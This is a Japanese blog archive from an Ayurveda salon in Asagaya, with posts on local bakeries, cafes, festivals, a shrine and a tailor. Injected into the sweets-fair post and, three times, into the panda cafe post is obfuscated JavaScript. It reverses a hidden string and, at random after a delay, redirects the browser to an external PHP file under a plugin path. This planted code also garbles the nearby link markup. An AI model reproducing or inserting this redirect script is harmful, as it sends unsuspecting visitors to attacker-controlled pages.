可愛くて美味しいパン屋さん

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
こないだ散歩中に、
いつも曲がる角をちょっと行きすぎてしまったら
ステキな看板を見つけました。
2013-09-2118s.jpg
「328(みつばち)パン工房」
どうやら土日だけやっているパン屋さんのようです。
ちょうど、見つけたのは金曜日だったので、
翌日、11時ぴったりに行ってみました[emoji:e-266]

入口は、かわいらしく鉢植えがきれいに飾られている民家。
看板の写真を撮っていたら、家の中から男性が出てきて
「お待たせしました~中へどうぞ」と言ってくださいました。
さっそく門を通って、お庭の中へと入ってみると、
奥にウッドデッキがあり、そこに面したお部屋の一部を開放して
パンが並べてありました。
2013-09-2103s.jpg
どれも、100円前後とお安く、小ぶりなので、
いろんなのを試したい独り暮らしにもぴったり。
奥様なのか、女性の方に欲しいものをいうと
袋に詰めてくださいます。
どれにするか、迷いに迷って3つほど購入しました。

2013-09-2113s.jpg
右上から、
ソーセージパン ¥120
パン・オ・レザン ¥120
ハワイアンブレッド ¥80
ソーセージパンは、もちもちしっかりした生地で
噛みごたえがあります。
パン・オ・レザンは大好きなパンなのですが、
カスタードの甘さも程よく美味しい[emoji:e-343] ハワイアンブレッドと言うのは、初めて食べました。
ほのかに優しい甘味です[emoji:e-349] どれも、一つ一つ丁寧に作られている感じが
伝わってきて、幸せになるパンでした[emoji:e-420]

お店は土日のみの営業で、
場所も住宅街で分かりやすくはないですが、
ご興味があれば、ぜひ一度食べてみてください[emoji:e-2] 他にも、季節のパンや焼き菓子なども
不定期であるので、facebookをチェックして
ちょいちょい通えたらと思ってます[emoji:e-454] アーユルヴェーダサロンmanas 《マナス》

阿佐ヶ谷七夕祭り2013

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
さて、先週末、阿佐ヶ谷名物「七夕祭り」
開催されました[emoji:e-2] 様々なはりぼてが並ぶシュールな七夕祭りが
私は大好きなのです。
ちなみに、昨年の様子はこちら→七夕祭り2012
今年もまた、力作ぞろいでした。
スパイダーマン、とってもでっかい。
2013-08-0910s.jpg
さすがアニメの町、阿佐ヶ谷。
2013-08-0921s.jpg
映画のテッドは、ふわふわっとしてました。
2013-08-0906s.jpg
もちろん、人気絶頂のあまちゃんもいます。
2013-08-0918s.jpg
で、今年の人気はやはりゆるキャラ
くまもんの首がくびれただけで、奇妙な違和感(笑)
2013-08-0907s.jpg
私の大好きな杉並のキャラクター「なみすけ」
かわいい[emoji:e-51]かわいい[emoji:e-51]かわいい[emoji:e-51] 2013-08-048s.jpg
2013-08-09 52s
んでもって、一番人気は「ふなっしー」
まあまあ、かわいいふなっしー。
2013-08-09 54s

ちょっと伸びちゃったふなっしー。
2013-08-0916s.jpg

ちょっと歪んだふなっしー。
2013-08-0920s.jpg

完全にホラーなふなっしー。
2013-08-0958s.jpg
これ最高[emoji:e-2]これぞ阿佐ヶ谷七夕です[emoji:e-2]
んでもって、私的大賞はこちら
2013-08-0912s.jpg
どうした、そらじろう~~~[emoji:e-2][emoji:e-2][emoji:e-2](笑)
今年も、みなさんの力作で楽しませてもらいました[emoji:e-2] 3Dで作品作るのって難しいですよね~
ホントにスゴイと思っちゃいます。
アーユルヴェーダサロンmanas 《マナス》

すぎなみスイーツフェア

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
すぎなみスイーツフェアに行ってきました
場所は、南阿佐ヶ谷の産業商工会館です。
「すぎなみスイーツフェア」のお知らせ
2012-11-11 20.16.05s
雨が降りそうな中でしたが、行ってみるとなかなかの大盛況
老若男女問わず、甘いものを求めてる人々で賑わってます。
高円寺のフリーペーパー「HAPPY」のキャラクターも参戦。
2012-11-11 18.53.23s
お子様たちに大人気
1Fは洋菓子、B1に和菓子のコーナーがあり
抹茶カフェや、イートインスペースもありましたが
お一人さまなので(笑)、ここはテイクアウトにしときました。

まず、前のめりに買ってしまったのがこちら。
2012-11-11 18.46.39s
なんと、杉並区のキャラクター「なみすけ」の焼き印入り
阿佐ヶ谷パールセンターにある「とらや椿山」さん
むしどら焼きと栗桃山です

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}der:none;” />
なみすけ焼印は、スイーツフェア限定と聞いて
思わず2つ買ってしまいました
もちろん洋菓子も買いましたよ~~
2012-11-11 18.51.23s
ずっと気になってた、高円寺「ラ・レーヌ」さん「王妃のプリン」
荻窪「手づくりケーキCOCORO」さん「生キャラメルロール」
どれもこれも美味しかったです~
同じ杉並でも、ちょっと遠いとなかなか足が向かないので
こうやって一度に買えるとうれしいですよねー
しかも入口で、すぐ使える50円引きクーポン付ちらしがもらえて
1個しか買わなくても、50円引きしてもらえちゃいます
3店で買った私は、150円分も得しちゃいました
(お店によって使えないところもありましたが…)
また次回も、時間が合えば行きたいですね~


10月のキャンペーンでお寄せいただいた感想を掲載してます
うれしいお言葉をたくさんいただきました。ぜひご覧くださいませ~~
☆お客様からの感想☆

アーユルヴェーダサロンmanas 《マナス》

阿佐ヶ谷 七夕祭り☆

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
阿佐ヶ谷の夏の大イベント「七夕祭り」
8月3日から今日7日まで行われています。
この七夕祭り、見どころは七夕とはおよそ関係ない
趣向を凝らしたはりぼて人形の数々であります。

小学校や中学校の生徒たちや、商店街の各店舗で
それぞれ好きなものを自由に作って飾っているのです。
こちらは魚の干物。
2012-08-06 12.52.04s
ガチャピンぽいものw
私的に今回の大賞。思わず2度見した
2012-08-06 12.54.08s
熊本とは多分関係ないけど。
2012-08-06 12.54.36s
文字で説明するパターン。
2012-08-06 12.55.50s
これは力作
こんなに大きいの作るのは本当に大変なはず。
2012-08-06 12.55.22s
集団なめこ。
2012-08-06 13.02.52s
なめことドキンちゃんの競演。
2012-08-06 13.07.04s
今回、定番人気のアンパンマンを追う人気キャラとして
なめことスパイダーマンが頑張ってました。
でも、個人で出品されてる方も結構いて、
かなりリスペクトです。
私も一度ぐらい挑戦してみようかしら…
アーユルヴェーダサロンmanas 《マナス》

お花見は善福寺川緑地

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
あああ、ブログ更新をさぼってしまいました…
と言うのも、1月に発行させていただいたクーポンのお客様が
たくさんご来店くださったために、
ちょっと時間とネタがなくなってしまい…(言い訳)
でも、ご来店下さったお客様からは
様々な感想をお寄せいただき、大変うれしい今日この頃です[emoji:e-266] ⇒ ispot お客様からの声
そして、すっかり暖かくなりましたね~[emoji:e-235][emoji:e-235][emoji:e-235] 阿佐ヶ谷のお花見と言えば、善福寺川緑地であります。
サロンからは少し歩きますが、私の家からはとても近いので
桜が咲く季節は、時間を見つけてお花見散歩に出かけるのです。
今年も、本当にきれいに咲いていました[emoji:e-343] IMG_20120409_140431s.jpg
善福寺川の両脇から水面に届きそうなぐらいまで
枝が伸びています。
だから↓桜に触れるほど近くで見れるんです。
C360_2012-04-09-15-47-41s.jpg
なんか、川と桜っていいですよね~
IMG_20120409_141231s.jpg
C360_2012-04-09-15-48-59s.jpg
川沿いは公園や、ジョギングコースになっていて
その脇にも桜をはじめ、木々がいっぱいです。
IMG_20120409_142220s.jpg
もちろん平日にもかかわらず、お花見客もたくさんでした。
最後に、今回の一番のお気に入り写真はこれ。
IMG_20120409_152825s.jpg
前の仕事を辞めてから毎年、桜を見に来ているので
この写真のように、桜と空を遠くに眺めながら
去年の今頃は何を思っていたのかなあと思い出したり、
来年はどうしてるのかなあ、と考えたりします。

もちろん、辛いことや不安もたくさんあるけれど、
この可憐な桜の下では、素敵なことばかり浮かんでくるので
すごくポジティブになれるのも素晴らしい。(笑)

桜に元気をもらって、がんばりまーす[emoji:e-241] アーユルヴェーダサロンmanas 《マナス》

氏神様にお参りするの巻

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
さあ、また阿佐ヶ谷のおすすめスポット情報です今回は…
阿佐ヶ谷 神明宮
http://shinmeiguu.com/
JR阿佐ヶ谷駅北口から徒歩数分のところにある
大きな神社でございます。
1326936712597s.jpg
実は、私は自宅の氏神様にはお参りしていたのですが
サロンの住所の氏神様にお参りしていないことに気づきまして

遅ればせながら、氏神様を調べるべく、
東京神社庁に電話しました。
自分の住んでいる土地を守っているといわれる氏神様は
近所の神社とは限らないので
神社庁に電話して、住所を言って調べてもらうのが正解。

(すぐ答えてもらえますよ)
自宅の氏神様も、そうやって調べてもらったんですが、
今まで全然知らなかった神社で、
家からも離れた場所にあったので結構ビックリ
聞いてみないと分からないもんなのです。
そんなこんなで、お電話してサロンの住所をお伝えすると、
意外な答えが…
「その住所だと馬橋稲荷神社か、神明宮になりますが、
 細かい区分けがこちらでは分からないので
 直接、二つの神社に電話して確認してもらえますか?」

と、電話番号を教えてくださったのです。
今まで、住所一発で教えてもらっていたので、
そんなに微妙な場所もあるもんなんだ~と妙に感心。
ちなみに馬橋稲荷は、私が以前住んでいた場所に近かったので
よくお参りに行っていた神社なんですが
神明宮に比べたらこじんまりとした神社でしたので
電話して聞くなら、最初は神明宮からにしようかなと判断。
さっそく神明宮に電話をかけ、東京神社庁から言われた旨を説明し、
住所を言うと…
「ちょっと待ってくださいね~
 (と地図を見てくれている模様)
 1丁目のどちらですか?」

「14です」
「えー、13は違いますね。
 14は…、14は…神明宮ですね

「え、13はちがうんですか?」
「はい、隣あってる13と9は馬橋稲荷になりますね」
と、思っていた以上に、区分けは相当細かかったです。
本当に微妙な境界線だったんですね、マナスは。(笑)

こうして無事、氏神様が判明したので
そのまま、すぐお参りに。
冒頭の立派な鳥居をくぐって、
きれいな参道を歩いていくと瑞祥門が見えてきます。
1326936761749s.jpg
ゆるやかな石段がありますが、右端はスロープになっている
神社には珍しいバリアフリー
そして、その先に拝殿があります。
1326936894388s.jpg
今まで、氏神様とは知らずにお参りしてましたので
より感謝の気持ちを込めてお参りしてきました
そして、サロン用にお札を拝受して、
おみくじをひくと…なんと大吉
先行きいいじゃないですか~~~
ちなみに、自分の家の氏神様でひいたおみくじは
「半吉」・・・

運勢的にはイマイチな感じですが
お参りマニアの私も初めて見たおみくじなので
見たことないレア感は逆に「いい」んじゃないかと
解釈しとります。(笑)

何事も前向きさが大切ですよ、みなさん。
神明宮は、私も平日の昼間に良くお参りに行きますが、
常に誰かが必ずお参りしてらっしゃるので
本当に地元の方に大切にされているなあと思います。
私も、いつもお守りいただいている感謝の気持ちを
ちょくちょくお伝えに行きたいです
それと、神明宮は、ちょっと前に大改修を行った際、
本殿を壊さず動かすという「曳家」という作業を行い、
それがタモリ倶楽部で取り上げられたんですよ~

私も、もちろん拝見しました。(笑)
そんな神明宮、阿佐ヶ谷駅からいらっしゃる方は
マナスに来る前にちょっと立ち寄ってみては
いかがでしょうか?
アーユルヴェーダサロンmanas 《マナス》

洋服のお直しをしてもらいました!

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
先日、気にいってる服に穴があいてるのを発見
ふわっとかぶるプルオーバー的なものなのですが、
ベルトの金具が当たるあたりに5ミリぐらいの穴と言うか
裂け目があったんですね。
まあ、ピタッと着るものではなかったので
パッと見穴があいてるのは気付かないのですけども
ちょっと乙女的にはどうなのだろうかと。
しかも、けっこう気に入っていて着る頻度も高かったので
これ以上、穴が大きくなると嫌だなあと思い、
近所のお直し屋さんを検索してみました。
と、出てきたのがこちら
「お直しサロン アン・コトン」
http://www.encoton.co.jp/
言われてみれば、
いつも通る、すずらん通りで見かけておりました。
近所にあって良かった~
ただ、実はこれ、気に入ってるとは言え、
かなりプチプラ服なので(笑)
あんまり高いと、元値を超える事態もあり得ますww
なので、ちょっとドキドキしながら持って行ってみました。
すると・・・
「穴をふさぐだけってかんじになりますけど、いいですか?」
それで十分ですよー
そして、肝心のお値段はというと・・・
素材と補修の内容から・・・
「だいたい1800円ぐらいになると思いますが、
 工房に出して見積もりが出たらご連絡しますね」

とのこと。
そう、見積もりを聞いてから、作業に入ってもらえるので
高くてちょっとーだったら
やめることもできるんですねー親切~
で、翌日、もらった見積もりは
最初にお伺いした通り「1800円」弱。
自分で直せないわけではないけど、絶対仕上がりがいいはず
と思ったので、お願いしてみました。
そして今日、お直ししてもらったのを受け取ってきました。
すると・・・
ぜんっぜん、わからない[emoji:e-2][emoji:e-2][emoji:e-2][emoji:e-2][emoji:e-2] 110627_1512~01
お店で見せてもらった時には、
直したところに、糸の印が残っていて「ここですね」って
言われたんだけれども、印をはずして返してくれたので、
家で写真撮ろうと思ったら
本当にどこだかわからなくて真剣に探しちゃったくらい分からない。
近くに寄ってみても、ほとんど気付かないはず[emoji:e-2] 110627_1444~01
言われれば、ちょっとつれてるかなあぐらいには見えるけど
穴あいてたなんて、まったく思えないですねー[emoji:e-446] やっぱりプロは違うなあと感心しきり。
ジャージー素材と言うか、綿ニットと言うか、
そんな感じの素材なのですが、引っ張っても大丈夫。
元々の生地に近い、伸縮性のある細い糸で
直してくれてるんでしょうね。
おうちの普通の糸でやっても、こうはいきませんですよ~
安い服でも、気に入ってる服は大切にしたいもの。
何かあったら、これからはお直ししよう[emoji:e-2]と思いました。
またまた、良いお店に出会ったなあ~[emoji:e-415] アーユルヴェーダサロンmanas 《マナス》

クロンボ定食とは・・・?

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
阿佐ヶ谷のおススメ第3弾は
スパゲティ&ハンバーグの店「クロンボ」
http://r.tabelog.com/tokyo/A1319/A131905/13078976/
実は、こじゃれたカフェもいいけど、
昔ながらの喫茶店が好きだったりするワタクシは、
阿佐ヶ谷にある、昔ながらの落ち着く洋食屋さん…
「クロンボ」をとても気に入ってます。
場所は、JR阿佐ヶ谷駅を出て、高架下にある
ゴールド街というツタヤが入ってる建物の中。
101215_1415~01
実は、この画像の真ん中にある看板に
「○○定食 500円」と言うのがずっと気になってて
ある時、勇気を出して入ってみたのが最初でした。
ゴールド街は、空いてるテナントが目立つけど
それがさらに、昭和レトロな雰囲気を醸し出してます。
クロンボは、そこの1階の一番奥で営業。
101215_1414~01
ポイントは、その安さ
ハンバーグ定食 450円
チーズハンバーグ定食 500円
カツとか、セットメニューもほとんど5~600円台。
ナポリタンに至っては、なんと420円
で、私のおすすめは、クロンボ定食
101215_1350~01
ハンバーグ・目玉焼き・半分ナポリタン
ご飯とみそ汁

これでしめて、650円
ハンバーグは小ぶりだけど手作りらしく、
十分おいしいし、デミソースも○。
目玉焼きもいい焼き具合で、
ソースと付け合わせのスパゲティ(パスタではない)も
相性バッチリです
もちろん、ナポリタンは昔風の
ちょっとやらかめのケチャップ風味で大好き
全体的に量が控えめなので、全然食べられちゃいます。
大食漢の人だと、ボリューム足りないかな…
食べログのレビュー見たら、
もやもやさまぁーずとかが、来たみたいですね~
確かに、そういう雰囲気です。(笑)

若干、薄暗いし、最初は入るのに勇気いります
でもランチ時には、私と同じような一人女子もいたし、
男性もほとんど一人が多いし、
席がそれぞれ離れてるので、入ってしまえば気になりません。
運んでくれるおねえさんが気が利く人で
お水が減ると、言わなくても入れに来てくれるのも○。

テーブルに、ふりかけが常備されてるので
白ご飯が苦手な人には、嬉しすぎるサービスでしょう。
(私は、いつもかけそびれてしまうけどw)
こういうお店は、ホントに続いてほしいです。
常連さんも多いみたいだし。
ああ、久しぶりにハンバーグ食べたくなっちゃうな~
※残念ながら閉店されてしまいました…(2011年7月末日)
110804_2138~01s
→その後、2011年12月に高円寺北口に再オープンされたようです[emoji:e-2]  桃太郎寿司の隣あたりとか。
 ばんざ~い[emoji:e-266]また食べに行きたい[emoji:e-454]

アーユルヴェーダサロンmanas 《マナス》

うさぎやさんのどら焼き

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
阿佐ヶ谷のおススメ第2弾は・・・
「うさぎや」
http://r.tabelog.com/tokyo/A1319/A131905/13000731/
もう、言わずと知れた阿佐ヶ谷の名店です。
「うさぎや」」は、上野と日本橋ににもあるそうで
阿佐ヶ谷のは、上野ののれん分けのお店だとか。
私は住み始めたころ、うさぎやを知らなかったんですが
阿佐ヶ谷に住んでるって言うと結構な確率で
「どら焼きのお店あるよね!」
とか、
「よくうさぎやさんに買いに行くよ!」
とか言われるんですよね。
そんな有名店ながら、私も阿佐ヶ谷にいながら、
しばらく場所もが分からなかったぐらい、地味な所にあります。
JRの阿佐ヶ谷駅北口を出て右を見ると
三菱東京UFJ銀行があるので、その横の細道を入っていきます。
二股に分かれてるので、左に行きます。
で、商店街の左側を見て歩いていれば、ほどなく見つかるはず。
101130_1443~01
昔ながらの和菓子屋さん~しかも小さめの~たたずまい。
引き戸を開けて中に入ると、見本の並んだカウンターがあり、
そこで、店員さんに注文すると、奥で包んできてくれます。
こちらには、いつも女性の店員さんが数名いらっしゃるんですが
みなさん、すごく感じがいいんです
前に手土産を買った時、ちょっと迷って
5個の箱入りをお願いしたら、
「3個入りとかもありますけど、いいですか?」
わざわざ聞いてくださって。
んまー親切と感動したんですよね。
その親切さに、「5個入り買っちゃう!!」と思いましたもん
で、こちらが大好きなどら焼き。
101130_1654~01
二つぐらい買うと、簡易包装で良いか聞かれて
コンパクトに紙包みしてくれます。
うさぎの絵の包みがかわいいですよねー
101130_1653~01
皮が厚めで、しっとりもっちりしてて美味しい
あんこの甘さもちょうどよくて、ぎっしり詰まってるので
厚めの皮とのバランスもバッチリ
かなりずっしりして、食べ応えがあるのに
重くなくてパクパク食べられちゃうのが、ある意味困ります。
また、このうさぎやさんは、店内でも食べられるそうなんですが
まだ食べたことはなく、お持ち帰り専門・・・
いつか食べてみたい~
アーユルヴェーダサロンmanas 《マナス》

ぱんだ珈琲店

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
初の阿佐ヶ谷スポットのご紹介はこちら。
「ぱんだ珈琲店」
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andacoffeeten.com/” target=”_blank” title=”http://pandacoffeeten.com/”>http://pandacoffeeten.com/
場所は、中杉通り沿いで
マナスに近い南阿佐ヶ谷駅とJR阿佐ヶ谷駅のちょうど真ん中ぐらい、
つけめん屋さんとフレッシュネスバーガーの間にあります。
ただ、すごい細いビルの2Fなので、すぐ入口を見逃します
なので、南阿佐ヶ谷からなら、みずほ銀行側の歩道を歩きながら
慎重に左斜め上あたりを見ていってください。
こんな看板があります。
101130_1449~02
JR阿佐ヶ谷駅からくるなら、中杉通りの右側を歩いて
右斜め下を見てると、立て看板もおいてあります。
101130_1449~01
この右側にお店に上がる階段がありますから
勇気を出して登ってみましょう。
(若干、狭くて急で天井が低いので頭をぶつけないようにw)
そうすると、お店の前から中からパンダだらけです。
萌えます
もちろん、メニューもみんなかわいい
100215_1751~01
ぱんだオレと、ホイップの乗ったぱんだモカオレ。
ぱんだセットにすると、ぱんだクッキーとアイスつき。
100215_1750~01
オムライスもぱんだ☆
100710_1334~01
これが萌えずにいられましょうか。いや、いられません。
かわいすぎて若干、鼻息が荒くなっちゃいます
こちらには、オリジナルグッズをはじめ、
いろんなぱんだグッズもたくさんあって
見るだけでも癒されちゃいますよ。
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andacoffeeten.com/?eid=869044″ target=”_blank” title=”オリジナルグッズ”>●オリジナルグッズとか
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andacoffeeten.com/?eid=869047 ” target=”_blank” title=”オリジナルじゃないグッズ”>●オリジナルじゃないグッズ(笑)も
いつも席が埋まってることが多い人気店なのですが
一度入るとなんだかくつろげる空間なので、
ぜひマナスに来た際にでもお立ち寄りを。
アーユルヴェーダサロンmanas 《マナス》